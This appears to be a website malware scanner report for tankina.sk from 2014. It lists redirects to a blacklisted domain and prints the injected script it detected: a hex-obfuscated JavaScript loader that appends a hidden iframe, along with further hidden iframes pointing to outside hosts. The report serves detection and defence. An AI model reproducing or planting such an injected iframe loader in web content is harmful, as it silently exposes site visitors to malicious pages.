Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tankina.sk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tankina.sk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 23 Sep 2014 00:57:22 GMT Location: http://mefa.ws/2/news.php?s=1c1804616b Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tankina.sk/ | 200 OK Content-Length: 29534 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: mefa.ws var jojo = document.createElement('iframe');jojo.setAttribute('width', '1');jojo.setAttribute('height', '1');jojo.setAttribute('style', 'display:none');jojo.setAttribute('src', '\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x65\x66\x61\x2E\x77\x73\x2F\x32\x2F\x6E\x65\x77\x73\x2E\x70\x68\x70\x3F\x73\x3D\x31\x63\x31\x38\x30\x34\x36\x31\x36\x62');document.body.appendChild(jojo); Decoded script: <iframe src=http://add-block-11.info/t/?ARI=130 width=0% height=0% scrolling=no frameborder=0 marginheight=0 marginwidth=0></iframe> Hidden iFrame found. The same iFrame was found in 42 websites. size: 2x4 src: http://gtwdnsglobe.org/ <iframe src="http://gtwdnsglobe.org/" width="2" height="4"> | ||
http://tankina.sk/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 00:57:25 GMT Location: http://mefa.ws/2/news.php?s=1c1804616b Server: Apache Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://mefa.ws/2/news.php?s=1c1804616b | 200 OK Content-Length: 22626 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tankina.sk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tankina.sk/
Result: tankina.sk is not infected or malware details are not published yet.
Result: tankina.sk is not infected or malware details are not published yet.